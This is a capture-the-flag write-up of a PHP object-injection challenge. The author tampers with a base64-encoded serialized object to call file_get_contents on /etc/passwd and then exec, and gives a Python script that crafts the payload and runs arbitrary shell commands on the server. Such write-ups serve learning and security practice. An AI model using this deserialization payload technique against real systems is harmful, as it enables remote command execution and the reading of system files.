In this question, we were given an URL “” and we were asked to be find the flag from that URL.

When I opened that website on Firefox this page welcomed me.


I tried some XSS and some SQL-injection payloads but I thought I was going into the rabbit hole. After some time my teammates suggested that try to divide 1 by 0. Then I did that (:

Division by zero error

After that error, I started to playing with the token. It was kind a base64 encoded json data.

O:10:"Expression":3:{s:14:"Expressionop";s:3:"div";s:18:"Expressionparams";a:2:{i:0;d:1;i:1;d:0;}s:9:"stringify";s:5:"1 / 0";}

I realized that this question is about PHP serialization stuff. I did some search on Google and I read an article about that topic[1]. Then I tried to execute a command by just changing some parts of that json data.

Expressionop: This calls a function by the function’s name.
Expressionparams: This is the parameters of the function that we call.

After I understood above, I crafted the json data below to test if that serialization/deserialization thing work. If this works then the server should return the content of the server’s /etc/passwd file. Because I used a PHP function called file_get_contents and passed the filename which is /etc/passwd as an argument.


Then encoded that data by using base64 and sent it back to the server by using its Share it link. And our test url was When I opened it on my Firefox I saw it was working.

Testing RCE

To find the flag quickly, I needed to get rid of these four steps: change something in json -> encode it > send it > analyze its results. Therefore, I wrote a small python shell to achieve these steps automatically. This time I used exec function from PHP and its argument was expected to be an OS command. (btw pls don’t judge me for this script)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# License           : MIT
# Author            : Mustafa ÇALAP
# Date              : 23.11.2018
# Last Modified Date: 23.11.2018

from base64 import b64encode, b64decode
import requests
import re

while True:
    url = ''

    php_func = 'exec'
    func_param = input('Command: ')
    if func_param == "":
        func_param = 'ls -la'
    func_param = func_param + ' | base64'
    payload = 'O:10:"Expression":3:{s:14:"'.encode() + b'\x00' + 'Expression'.encode() + b'\x00' + 'op";s:'.encode() + str(len(php_func)).encode() + ':"'.encode() + php_func.encode() + '";s:18:"'.encode() + b'\x00' + 'Expression'.encode() + b'\x00' + 'params";s:'.encode() + str(len(func_param)).encode() + ':"'.encode() + func_param.encode() + '";s:9:"stringify";s:4:"TEST";}'.encode()

    token = b64encode(payload)

    final = url + token.decode()

    session = requests.Session()
    req = session.get(final)

    res = re.findall('<pre>(.*)</pre>',req.text, flags=re.DOTALL)
    print('='*20 + 'URL' + '='*20)
    print('='*20 + 'RESULT' + '='*20)

I list the root directory of the server and I saw the file fl4g_h4r3 then read it and got the point.

Getting the Flag

I believe this was the easiest challenge because it was the only challenge that I could manage to solve (: